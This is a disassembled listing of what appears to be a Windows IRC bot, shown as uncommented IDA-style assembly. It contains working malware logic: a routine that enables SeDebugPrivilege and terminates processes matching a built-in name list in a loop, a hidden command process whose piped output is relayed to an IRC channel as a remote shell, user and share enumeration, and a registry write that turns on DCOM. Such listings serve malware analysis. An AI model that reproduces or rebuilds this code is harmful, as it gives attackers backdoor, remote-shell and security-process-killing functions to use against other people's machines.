lea eax, [ebp+arg_C]
push eax
lea eax, [ebp+var_4]
push 0FFFFFFFFh
push eax
push 2
push esi
push [ebp+var_14]
call ds:dword_4CB5B4
cmp eax, esi
mov [ebp+var_C], eax
jz short loc_419380
cmp eax, 0EAh
jz short loc_419380
push eax
push eax
call sub_419460
pop ecx
push eax
lea eax, [ebp+var_218]
push offset unk_439A50
push eax
call sub_41B886
push esi
lea eax, [ebp+var_218]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409A73
add esp, 24h
jmp short loc_4193FB
; ---------------------------------------------------------------------------
loc_419380: ; CODE XREF: sub_4192E0+62�j
; sub_4192E0+69�j
mov edi, [ebp+var_4]
cmp edi, esi
jz loc_41940E
xor ebx, ebx
cmp [ebp+arg_C], esi
jbe short loc_4193FB
loc_419392: ; CODE XREF: sub_4192E0+ED�j
cmp edi, esi
jz short loc_4193D1
push dword ptr [edi]
lea eax, [ebp+var_218]
push offset aS_4 ; " %S"
push eax
call sub_41B886
push 1
lea eax, [ebp+var_218]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409A73
add esp, 20h
add edi, 4
inc [ebp+var_8]
inc ebx
cmp ebx, [ebp+arg_C]
jb short loc_419392
jmp short loc_4193FB
; ---------------------------------------------------------------------------
loc_4193D1: ; CODE XREF: sub_4192E0+B4�j
lea eax, [ebp+var_218]
push offset unk_439A1C
push eax
call sub_41B886
push esi
lea eax, [ebp+var_218]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409A73
add esp, 1Ch
loc_4193FB: ; CODE XREF: sub_4192E0+9E�j
; sub_4192E0+B0�j ...
mov edi, [ebp+var_4]
cmp edi, esi
jz short loc_41940E
push edi
call ds:dword_4CB6E4
xor edi, edi
mov [ebp+var_4], edi
loc_41940E: ; CODE XREF: sub_4192E0+A5�j
; sub_4192E0+120�j
cmp [ebp+var_C], 0EAh
jz loc_41931F
cmp edi, esi
jz short loc_419426
push edi
call ds:dword_4CB6E4
loc_419426: ; CODE XREF: sub_4192E0+13D�j
push [ebp+var_8]
lea eax, [ebp+var_218]
push offset aTotalUsersFoun ; "Total users found: %d."
push eax
call sub_41B886
push esi
lea eax, [ebp+var_218]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409A73
add esp, 20h
xor eax, eax
cmp [ebp+var_C], esi
pop edi
pop esi
setz al
pop ebx
leave
retn
sub_4192E0 endp
; =============== S U B R O U T I N E =======================================
sub_419460 proc near ; CODE XREF: sub_418A99+41�p
; sub_418C8F+69�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, 858h
cmp eax, ecx
ja loc_419512
jz loc_41950B
cmp eax, 7Bh
ja short loc_4194D7
jz short loc_4194CD
cmp eax, 5
jz short loc_4194C3
cmp eax, 8
jz short loc_4194B9
cmp eax, 32h
jz short loc_4194AF
cmp eax, 35h
jz short loc_4194A5
cmp eax, 57h
jnz loc_419561
push offset aInvalidParamet ; "Invalid parameter."
jmp loc_419582
; ---------------------------------------------------------------------------
loc_4194A5: ; CODE XREF: sub_419460+30�j
push offset aServerNameNotF ; "Server name not found."
jmp loc_419582
; ---------------------------------------------------------------------------
loc_4194AF: ; CODE XREF: sub_419460+2B�j
push offset aThisNetworkReq ; "This network request is not supported."
jmp loc_419582
; ---------------------------------------------------------------------------
loc_4194B9: ; CODE XREF: sub_419460+26�j
push offset aNotEnoughMemor ; "Not enough memory."
jmp loc_419582
; ---------------------------------------------------------------------------
loc_4194C3: ; CODE XREF: sub_419460+21�j
push offset aAccessDenied_ ; "Access denied."
jmp loc_419582
; ---------------------------------------------------------------------------
loc_4194CD: ; CODE XREF: sub_419460+1C�j
push offset aTheNameIsInval ; "The name is invalid."
jmp loc_419582
; ---------------------------------------------------------------------------
loc_4194D7: ; CODE XREF: sub_419460+1A�j
sub eax, 7Ch
jz short loc_419504
sub eax, 7C8h
jz short loc_4194FD
dec eax
jz short loc_4194F3
dec eax
jnz short loc_419561
push offset aDuplicateShare ; "Duplicate share name."
jmp loc_419582
; ---------------------------------------------------------------------------
loc_4194F3: ; CODE XREF: sub_419460+84�j
push offset aInvalidForRedi ; "Invalid for redirected resource."
jmp loc_419582
; ---------------------------------------------------------------------------
loc_4194FD: ; CODE XREF: sub_419460+81�j
push offset aDeviceOrDirect ; "Device or directory does not exist."
jmp short loc_419582
; ---------------------------------------------------------------------------
loc_419504: ; CODE XREF: sub_419460+7A�j
push offset aLevelParameter ; "Level parameter is invalid."
jmp short loc_419582
; ---------------------------------------------------------------------------
loc_41950B: ; CODE XREF: sub_419460+11�j
push offset aAGeneralFailur ; "A general failure occurred in the netwo"...
jmp short loc_419582
; ---------------------------------------------------------------------------
loc_419512: ; CODE XREF: sub_419460+B�j
mov ecx, 8C5h
cmp eax, ecx
ja short loc_41954B
jz short loc_419544
sub eax, 8ADh
jz short loc_419576
dec eax
dec eax
jz short loc_41953D
dec eax
jz short loc_419536
dec eax
dec eax
jnz short loc_419561
push offset aTheOperationIs ; "The operation is allowed only on the pr"...
jmp short loc_419582
; ---------------------------------------------------------------------------
loc_419536: ; CODE XREF: sub_419460+C9�j
push offset aTheUserAccount ; "The user account already exists."
jmp short loc_419582
; ---------------------------------------------------------------------------
loc_41953D: ; CODE XREF: sub_419460+C6�j
push offset aTheGroupAlread ; "The group already exists."
jmp short loc_419582
; ---------------------------------------------------------------------------
loc_419544: ; CODE XREF: sub_419460+BB�j
push offset aThePasswordIsS ; "The password is shorter than required ("...
jmp short loc_419582
; ---------------------------------------------------------------------------
loc_41954B: ; CODE XREF: sub_419460+B9�j
sub eax, 8CAh
jz short loc_41957D
sub eax, 17h
jz short loc_419576
sub eax, 25h
jz short loc_41956F
sub eax, 29h
jz short loc_419568
loc_419561: ; CODE XREF: sub_419460+35�j
; sub_419460+87�j ...
push offset aAnUnknownErr_0 ; "An unknown error occurred."
jmp short loc_419582
; ---------------------------------------------------------------------------
loc_419568: ; CODE XREF: sub_419460+FF�j
push offset aTheComputerNam ; "The computer name is invalid."
jmp short loc_419582
; ---------------------------------------------------------------------------
loc_41956F: ; CODE XREF: sub_419460+FA�j
push offset aShareNotFound_ ; "Share not found."
jmp short loc_419582
; ---------------------------------------------------------------------------
loc_419576: ; CODE XREF: sub_419460+C2�j
; sub_419460+F5�j
push offset aTheUserNameCou ; "The user name could not be found."
jmp short loc_419582
; ---------------------------------------------------------------------------
loc_41957D: ; CODE XREF: sub_419460+F0�j
push offset aNetworkConnect ; "Network connection not found."
loc_419582: ; CODE XREF: sub_419460+40�j
; sub_419460+4A�j ...
push offset dword_4DB270
call sub_41B886
pop ecx
mov eax, offset dword_4DB270
pop ecx
retn
sub_419460 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419594 proc near ; CODE XREF: sub_401ACD+4782�p
var_718 = byte ptr -718h
var_318 = byte ptr -318h
var_108 = byte ptr -108h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 718h
push esi
push 200h
push [ebp+arg_0]
lea eax, [ebp+var_718]
push eax
call sub_41D834
add esp, 0Ch
lea eax, [ebp+arg_0]
mov esi, 108h
push eax
lea eax, [ebp+var_108]
push eax
mov [ebp+arg_0], esi
call dword_4270C0 ; GetComputerNameA
lea eax, [ebp+var_108]
push esi
push eax
lea eax, [ebp+var_318]
push eax
call sub_41D834
lea eax, [ebp+var_718]
push eax
call sub_41D817
add esp, 10h
shl eax, 1
push eax
lea eax, [ebp+var_718]
push eax
lea eax, [ebp+var_318]
push 0
push eax
push 0
call ds:dword_4CB664
test eax, eax
jnz short loc_419624
mov esi, offset dword_4DB06C
push offset unk_439D84
push esi
call sub_41B886
pop ecx
pop ecx
jmp short loc_41964D
; ---------------------------------------------------------------------------
loc_419624: ; CODE XREF: sub_419594+7A�j
lea ecx, [ebp+var_718]
push ecx
lea ecx, [ebp+var_318]
push ecx
push eax
call sub_419460
pop ecx
mov esi, offset dword_4DB06C
push eax
push offset dword_439D58
push esi
call sub_41B886
add esp, 14h
loc_41964D: ; CODE XREF: sub_419594+8E�j
mov eax, esi
pop esi
leave
retn
sub_419594 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419652 proc near ; CODE XREF: sub_416F1B+45�p
; sub_416F1B+166�p ...
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
lea eax, [ebp+var_4]
push eax
push 28h
call dword_4270F8 ; GetCurrentProcess
push eax
call ds:dword_4CB638 ; OpenProcessToken
test eax, eax
jnz short loc_419671
leave
retn
; ---------------------------------------------------------------------------
loc_419671: ; CODE XREF: sub_419652+1B�j
lea eax, [ebp+var_10]
push esi
push eax
xor esi, esi
push [ebp+arg_0]
push esi
call ds:dword_4CB610 ; LookupPrivilegeValueA
test eax, eax
jz short loc_4196AF
cmp [ebp+arg_4], esi
mov [ebp+var_14], 1
jz short loc_419698
or [ebp+var_8], 2
jmp short loc_41969C
; ---------------------------------------------------------------------------
loc_419698: ; CODE XREF: sub_419652+3E�j
and [ebp+var_8], 0FFFFFFFDh
loc_41969C: ; CODE XREF: sub_419652+44�j
push esi
push esi
lea eax, [ebp+var_14]
push esi
push eax
push esi
push [ebp+var_4]
call ds:dword_4CB6C0 ; AdjustTokenPrivileges
mov esi, eax
loc_4196AF: ; CODE XREF: sub_419652+32�j
push [ebp+var_4]
call dword_427068 ; CloseHandle
mov eax, esi
pop esi
leave
retn
sub_419652 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4196BD proc near ; CODE XREF: sub_401ACD+7916�p
; sub_4198EC+74�p ...
var_554 = byte ptr -554h
var_354 = dword ptr -354h
var_350 = byte ptr -350h
var_234 = byte ptr -234h
var_130 = dword ptr -130h
var_12C = byte ptr -12Ch
var_128 = dword ptr -128h
var_10C = byte ptr -10Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 554h
push ebx
push esi
push edi
push 49h
xor ebx, ebx
pop ecx
xor eax, eax
cmp ds:dword_4CB674, ebx
lea edi, [ebp+var_12C]
mov [ebp+var_130], ebx
rep stosd
mov ecx, 88h
lea edi, [ebp+var_350]
mov [ebp+var_354], ebx
rep stosd
jz loc_4198BC
cmp ds:dword_4CB658, ebx
jz loc_4198BC
cmp ds:dword_4CB568, ebx
jz loc_4198BC
push 1
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_419652
pop ecx
pop ecx
push ebx
push 0Fh
call ds:dword_4CB674 ; CreateToolhelp32Snapshot
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_8], edi
jz loc_4198AF
lea eax, [ebp+var_130]
mov [ebp+var_130], 128h
push eax
push edi
call ds:dword_4CB658 ; Process32First
mov esi, dword_427068
test eax, eax
jz loc_4198AA
lea eax, [ebp+var_130]
push eax
push edi
call ds:dword_4CB568 ; Process32Next
test eax, eax
jz loc_4198AA
mov edi, dword_427084
mov ebx, 1F0FFFh
loc_419781: ; CODE XREF: sub_4196BD+1E5�j
xor eax, eax
cmp [ebp+arg_10], eax
jz short loc_4197E8
mov [ebp+var_4], offset off_439DB0
loc_41978F: ; CODE XREF: sub_4196BD+F3�j
mov eax, [ebp+var_4]
push dword ptr [eax]
lea eax, [ebp+var_10C]
push eax
call dword_427184 ; lstrcmpi
test eax, eax
jz short loc_4197B7
add [ebp+var_4], 4
cmp [ebp+var_4], offset dword_439E10
jb short loc_41978F
jmp loc_419890
; ---------------------------------------------------------------------------
loc_4197B7: ; CODE XREF: sub_4196BD+E6�j
push [ebp+var_128]
push 0
push ebx
call edi ; OpenProcess
test eax, eax
mov [ebp+var_4], eax
jz loc_419890
push 0
push eax
call dword_4270F0 ; TerminateProcess
test eax, eax
jnz loc_419890
loc_4197DE: ; CODE XREF: sub_4196BD+1B9�j
push [ebp+var_4]
call esi ; CloseHandle
jmp loc_419890
; ---------------------------------------------------------------------------
loc_4197E8: ; CODE XREF: sub_4196BD+C9�j
cmp [ebp+arg_C], eax
jnz loc_41987B
cmp [ebp+arg_4], eax
jz loc_419890
push [ebp+var_128]
push 8
call ds:dword_4CB674 ; CreateToolhelp32Snapshot
cmp [ebp+arg_14], 0
mov [ebp+var_4], eax
mov [ebp+var_354], 224h
jz short loc_41983B
lea ecx, [ebp+var_354]
push ecx
push eax
call ds:dword_4CB514 ; Module32First
push [ebp+var_128]
test eax, eax
jz short loc_419841
lea eax, [ebp+var_234]
jmp short loc_419847
; ---------------------------------------------------------------------------
loc_41983B: ; CODE XREF: sub_4196BD+15C�j
push [ebp+var_128]
loc_419841: ; CODE XREF: sub_4196BD+174�j
lea eax, [ebp+var_10C]
loc_419847: ; CODE XREF: sub_4196BD+17C�j
push eax
lea eax, [ebp+var_554]
push offset aSD_0 ; " %s (%d)"
push eax
call sub_41B886
add esp, 10h
lea eax, [ebp+var_554]
push 1
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409A73
add esp, 14h
jmp loc_4197DE
; ---------------------------------------------------------------------------
loc_41987B: ; CODE XREF: sub_4196BD+12E�j
push [ebp+arg_C]
lea eax, [ebp+var_10C]
push eax
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz short loc_4198C3
loc_419890: ; CODE XREF: sub_4196BD+F5�j
; sub_4196BD+10A�j ...
lea eax, [ebp+var_130]
push eax
push [ebp+var_8]
call ds:dword_4CB568 ; Process32Next
test eax, eax
jnz loc_419781
xor ebx, ebx
loc_4198AA: ; CODE XREF: sub_4196BD+9D�j
; sub_4196BD+B3�j
push [ebp+var_8]
call esi ; CloseHandle
loc_4198AF: ; CODE XREF: sub_4196BD+77�j
push ebx
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_419652
pop ecx
pop ecx
loc_4198BC: ; CODE XREF: sub_4196BD+3A�j
; sub_4196BD+46�j ...
xor eax, eax
loc_4198BE: ; CODE XREF: sub_4196BD+22D�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_4198C3: ; CODE XREF: sub_4196BD+1D1�j
push [ebp+var_128]
push 0
push ebx
call edi ; OpenProcess
push [ebp+var_8]
mov edi, eax
call esi ; CloseHandle
push 0
push edi
call dword_4270F0 ; TerminateProcess
test eax, eax
jnz short loc_4198E7
push edi
call esi ; CloseHandle
jmp short loc_4198BC
; ---------------------------------------------------------------------------
loc_4198E7: ; CODE XREF: sub_4196BD+223�j
push 1
pop eax
jmp short loc_4198BE
sub_4196BD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4198EC proc near ; DATA XREF: sub_401ACD+26CE�o
var_298 = byte ptr -298h
var_98 = dword ptr -98h
var_94 = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 298h
mov eax, [ebp+arg_0]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp+var_98]
push offset unk_439FB0
rep movsd
mov dword ptr [eax+94h], 1
lea eax, [ebp+var_298]
push eax
call sub_41B886
xor esi, esi
pop ecx
cmp [ebp+var_8], esi
pop ecx
jnz short loc_41994B
push esi
lea eax, [ebp+var_298]
push [ebp+var_C]
push eax
lea eax, [ebp+var_94]
push eax
push [ebp+var_98]
call sub_409A73
add esp, 14h
loc_41994B: ; CODE XREF: sub_4198EC+3D�j
push [ebp+var_10]
lea eax, [ebp+var_94]
push esi
push esi
push [ebp+var_C]
push eax
push [ebp+var_98]
call sub_4196BD
add esp, 18h
test eax, eax
jnz short loc_419973
push offset unk_439F8C
jmp short loc_419978
; ---------------------------------------------------------------------------
loc_419973: ; CODE XREF: sub_4198EC+7E�j
push offset unk_439F68
loc_419978: ; CODE XREF: sub_4198EC+85�j
lea eax, [ebp+var_298]
push eax
call sub_41B886
cmp [ebp+var_8], esi
pop ecx
pop ecx
jnz short loc_4199AB
push esi
lea eax, [ebp+var_298]
push [ebp+var_C]
push eax
lea eax, [ebp+var_94]
push eax
push [ebp+var_98]
call sub_409A73
add esp, 14h
loc_4199AB: ; CODE XREF: sub_4198EC+9D�j
lea eax, [ebp+var_298]
push eax
call sub_4151AD
push [ebp+var_14]
call sub_40B413
pop ecx
pop ecx
push esi
call dword_4270CC ; ExitThread
pop edi
pop esi
sub_4198EC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4199CA proc near ; CODE XREF: sub_401ACD+78B4�p
; sub_40B232+53�p
arg_0 = dword ptr 4
push esi
push edi
push 1
pop edi
push [esp+8+arg_0]
push 0
push 1F0FFFh
call dword_427084 ; OpenProcess
mov esi, eax
test esi, esi
jz short loc_4199FC
push 0
push esi
call dword_4270F0 ; TerminateProcess
test eax, eax
jnz short loc_4199FC
push esi
xor edi, edi
call dword_427068 ; CloseHandle
loc_4199FC: ; CODE XREF: sub_4199CA+1A�j
; sub_4199CA+27�j
mov eax, edi
pop edi
pop esi
retn
sub_4199CA endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_419A01 proc near ; DATA XREF: sub_401221+3CD�o
push esi
xor esi, esi
loc_419A04: ; CODE XREF: sub_419A01+1E�j
push 1
push esi
push esi
push esi
push esi
push esi
call sub_4196BD
add esp, 18h
push dword_439DAC
call dword_427078 ; Sleep
jmp short loc_419A04
sub_419A01 endp
; =============== S U B R O U T I N E =======================================
sub_419A21 proc near ; CODE XREF: sub_419A51+2A�p
; sub_419A89+7E�p ...
mov eax, ds:dword_4DB8D8
push esi
mov esi, dword_427068
cmp eax, 0FFFFFFFFh
jz short loc_419A35
push eax
call esi ; CloseHandle
loc_419A35: ; CODE XREF: sub_419A21+F�j
mov eax, ds:dword_4DB8E0
cmp eax, 0FFFFFFFFh
jz short loc_419A42
push eax
call esi ; CloseHandle
loc_419A42: ; CODE XREF: sub_419A21+1C�j
mov eax, ds:dword_4DB8D4
cmp eax, 0FFFFFFFFh
jz short loc_419A4F
push eax
call esi ; CloseHandle
loc_419A4F: ; CODE XREF: sub_419A21+29�j
pop esi
retn
sub_419A21 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419A51 proc near ; CODE XREF: sub_401ACD+7605�p
; sub_415C5A+14A�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push [ebp+arg_0]
call sub_41AFE0
pop ecx
mov [ebp+var_4], eax
lea ecx, [ebp+var_4]
push 0
push ecx
push eax
push [ebp+arg_0]
push ds:dword_4DB8DC
call dword_4270E0 ; WriteFile
test eax, eax
jnz short loc_419A84
call sub_419A21
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_419A84: ; CODE XREF: sub_419A51+28�j
push 1
pop eax
leave
retn
sub_419A51 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419A89 proc near ; CODE XREF: sub_419B10+D3�p
; sub_419B10+F2�p ...
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
push offset byte_43D808
push [ebp+arg_4]
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz short loc_419ACC
push 7D0h
call dword_427078 ; Sleep
push [ebp+arg_8]
lea eax, [ebp+var_200]
push [ebp+arg_4]
push offset aPrivmsgSS ; "PRIVMSG %s :%s\r"
push eax
call sub_41B886
add esp, 10h
jmp short loc_419AE3
; ---------------------------------------------------------------------------
loc_419ACC: ; CODE XREF: sub_419A89+1A�j
push [ebp+arg_8]
lea eax, [ebp+var_200]
push offset aS_2 ; "%s"
push eax
call sub_41B886
add esp, 0Ch
loc_419AE3: ; CODE XREF: sub_419A89+41�j
lea eax, [ebp+var_200]
push 0
push eax
call sub_41AFE0
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call ds:dword_4CB6A4 ; send
test eax, eax
jg short loc_419B0C
call sub_419A21
loc_419B0C: ; CODE XREF: sub_419A89+7C�j
xor eax, eax
leave
retn
sub_419A89 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419B10 proc near ; DATA XREF: sub_419C65+170�o
var_20C = byte ptr -20Ch
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20Ch
push ebx
push esi
push edi
mov esi, 200h
xor edi, edi
mov ebx, offset dword_4DB8E4
loc_419B28: ; CODE XREF: sub_419B10+79�j
; sub_419B10+DB�j
push esi
lea eax, [ebp+var_20C]
push edi
push eax
call sub_41B590
add esp, 0Ch
lea eax, [ebp+var_4]
push edi
push edi
push eax
lea eax, [ebp+var_20C]
push esi
push eax
push ds:dword_4DB8D8
call dword_42718C ; PeekNamedPipe
test eax, eax
jz loc_419BF6
cmp [ebp+var_4], edi
jnz short loc_419B8B
lea eax, [ebp+var_8]
push eax
push ds:dword_4DB8D4
call dword_427188 ; GetExitCodeProcess
test eax, eax
jz short loc_419B81
cmp [ebp+var_8], 103h
jnz loc_419C1A
loc_419B81: ; CODE XREF: sub_419B10+62�j
push 0Ah
call dword_427078 ; Sleep
jmp short loc_419B28
; ---------------------------------------------------------------------------
loc_419B8B: ; CODE XREF: sub_419B10+4E�j
xor eax, eax
cmp [ebp+var_4], edi
jbe short loc_419BA2
loc_419B92: ; CODE XREF: sub_419B10+90�j
cmp [ebp+eax+var_20C], 0Ah
jz short loc_419BF0
inc eax
cmp eax, [ebp+var_4]
jb short loc_419B92
loc_419BA2: ; CODE XREF: sub_419B10+80�j
mov [ebp+var_4], esi
loc_419BA5: ; CODE XREF: sub_419B10+E4�j
push esi
lea eax, [ebp+var_20C]
push edi
push eax
call sub_41B590
add esp, 0Ch
lea eax, [ebp+var_C]
push edi
push eax
push [ebp+var_4]
lea eax, [ebp+var_20C]
push eax
push ds:dword_4DB8D8
call dword_4270E8 ; ReadFile
test eax, eax
jz short loc_419C42
lea eax, [ebp+var_20C]
push eax
push ebx
push ds:dword_4DB918
call sub_419A89
add esp, 0Ch
jmp loc_419B28
; ---------------------------------------------------------------------------
loc_419BF0: ; CODE XREF: sub_419B10+8A�j
inc eax
mov [ebp+var_4], eax
jmp short loc_419BA5
; ---------------------------------------------------------------------------
loc_419BF6: ; CODE XREF: sub_419B10+45�j
push offset unk_43A038
push ebx
push ds:dword_4DB918
call sub_419A89
push [ebp+arg_0]
call sub_40B413
add esp, 10h
push 1
call dword_4270CC ; ExitThread
loc_419C1A: ; CODE XREF: sub_419B10+6B�j
call sub_419A21
push offset unk_43A010
push ebx
push ds:dword_4DB918
call sub_419A89
push [ebp+arg_0]
call sub_40B413
add esp, 10h
push edi
call dword_4270CC ; ExitThread
loc_419C42: ; CODE XREF: sub_419B10+C3�j
push offset unk_439FE0
push ebx
push ds:dword_4DB918
call sub_419A89
push [ebp+arg_0]
call sub_40B413
add esp, 10h
push edi
call dword_4270CC ; ExitThread
sub_419B10 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419C65 proc near ; CODE XREF: sub_401ACD+2508�p
; sub_415C5A+99�p
var_378 = byte ptr -378h
var_178 = byte ptr -178h
var_74 = dword ptr -74h
var_48 = dword ptr -48h
var_44 = word ptr -44h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = byte ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 378h
push ebx
push esi
push edi
call sub_419A21
xor esi, esi
lea eax, [ebp+var_178]
push esi
push eax
push 104h
push esi
push offset dword_433C04
push esi
call ds:dword_4CB710 ; SearchPathA
test eax, eax
jz loc_419D5F
push 1
lea eax, [ebp+var_1C]
pop ebx
mov edi, dword_4270FC
push esi
push eax
lea eax, [ebp+var_C]
mov [ebp+var_1C], 0Ch
push eax
lea eax, [ebp+var_10]
push eax
mov [ebp+var_14], ebx
mov [ebp+var_18], esi
call edi ; CreatePipe
test eax, eax
jz loc_419D5F
lea eax, [ebp+var_1C]
push esi
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
call edi ; CreatePipe
test eax, eax
jz loc_419D5F
mov edi, dword_4270F8
push 3
push esi
push esi
push offset dword_4DB8DC
call edi ; GetCurrentProcess
push eax
push [ebp+var_8]
call edi ; GetCurrentProcess
push eax
call dword_4270F4 ; DuplicateHandle
test eax, eax
jz short loc_419D5F
push 10h
lea eax, [ebp+var_2C]
push esi
push eax
call sub_41B590
push 44h
lea eax, [ebp+var_74]
pop edi
push edi
push esi
push eax
call sub_41B590
mov eax, [ebp+var_4]
add esp, 18h
mov [ebp+var_3C], eax
mov eax, [ebp+var_C]
mov [ebp+var_38], eax
mov [ebp+var_34], eax
lea eax, [ebp+var_2C]
mov [ebp+var_74], edi
push eax
lea eax, [ebp+var_74]
push eax
push esi
push esi
push esi
push ebx
push esi
mov ebx, offset byte_43D808
push esi
lea eax, [ebp+var_178]
push ebx
push eax
mov [ebp+var_48], 101h
mov [ebp+var_44], si
call dword_42706C ; CreateProcessA
test eax, eax
jnz short loc_419D67
loc_419D5F: ; CODE XREF: sub_419C65+2F�j
; sub_419C65+5C�j ...
or eax, 0FFFFFFFFh
jmp loc_419E15
; ---------------------------------------------------------------------------
loc_419D67: ; CODE XREF: sub_419C65+F8�j
push [ebp+var_4]
mov edi, dword_427068
call edi ; CloseHandle
mov eax, [ebp+var_10]
push [ebp+var_28]
mov ds:dword_4DB8D8, eax
mov eax, [ebp+var_8]
mov ds:dword_4DB8E0, eax
mov eax, [ebp+var_2C]
mov ds:dword_4DB8D4, eax
call edi ; CloseHandle
mov eax, [ebp+arg_0]
cmp [ebp+arg_4], esi
mov ds:dword_4DB918, eax
jz short loc_419DA1
push [ebp+arg_4]
jmp short loc_419DA2
; ---------------------------------------------------------------------------
loc_419DA1: ; CODE XREF: sub_419C65+135�j
push ebx
loc_419DA2: ; CODE XREF: sub_419C65+13A�j
push offset dword_4DB8E4
call sub_41B886
pop ecx
pop ecx
push esi
push 0Ah
push offset unk_43A09C
call sub_40B0F7
mov edi, eax
mov ecx, [ebp+var_24]
imul edi, 234h
add esp, 0Ch
mov dword_43E598[edi], ecx
lea ecx, [ebp+var_30]
push ecx
push esi
push eax
push offset sub_419B10
push esi
push esi
call dword_42707C ; CreateThread
cmp eax, esi
mov dword_43E5A4[edi], eax
jnz short loc_419E13
call dword_42708C ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_378]
push offset unk_43A068
push eax
call sub_41B886
lea eax, [ebp+var_378]
push eax
call sub_4151AD
add esp, 10h
loc_419E13: ; CODE XREF: sub_419C65+185�j
xor eax, eax
loc_419E15: ; CODE XREF: sub_419C65+FD�j
pop edi
pop esi
pop ebx
leave
retn
sub_419C65 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419E1A proc near ; DATA XREF: sub_401ACD+2E0C�o
var_98 = dword ptr -98h
var_94 = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 98h
mov eax, [ebp+arg_0]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp+var_98]
rep movsd
pop edi
pop esi
push [ebp+var_8]
cmp [ebp+var_10], 0
mov dword ptr [eax+94h], 1
lea eax, [ebp+var_94]
push [ebp+var_C]
push eax
push [ebp+var_98]
jz short loc_419E61
call sub_419E7A
jmp short loc_419E66
; ---------------------------------------------------------------------------
loc_419E61: ; CODE XREF: sub_419E1A+3E�j
call sub_41A19E
loc_419E66: ; CODE XREF: sub_419E1A+45�j
add esp, 10h
push [ebp+var_14]
call sub_40B413
pop ecx
push 0
call dword_4270CC ; ExitThread
sub_419E1A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419E7A proc near ; CODE XREF: sub_419E1A+40�p
var_214 = byte ptr -214h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 214h
push esi
push edi
xor edi, edi
cmp ds:dword_4CB724, edi
jnz loc_419FAC
lea eax, [ebp+var_4]
mov esi, 80000002h
push eax
push 2001Fh
push edi
push offset aSoftwareMicros ; "Software\\Microsoft\\OLE"
push esi
call ds:dword_4CB6C4 ; RegOpenKeyExA
test eax, eax
jnz short loc_419F05
mov ax, word_438E18
mov word ptr [ebp+var_8+2], ax
lea eax, [ebp+var_8+2]
push eax
call sub_41AFE0
pop ecx
push eax
lea eax, [ebp+var_8+2]
push eax
push 1
push edi
push offset aEnabledcom ; "EnableDCOM"
push [ebp+var_4]
call ds:dword_4CB678 ; RegSetValueExA
test eax, eax
jz short loc_419EE7
push offset dword_43A338
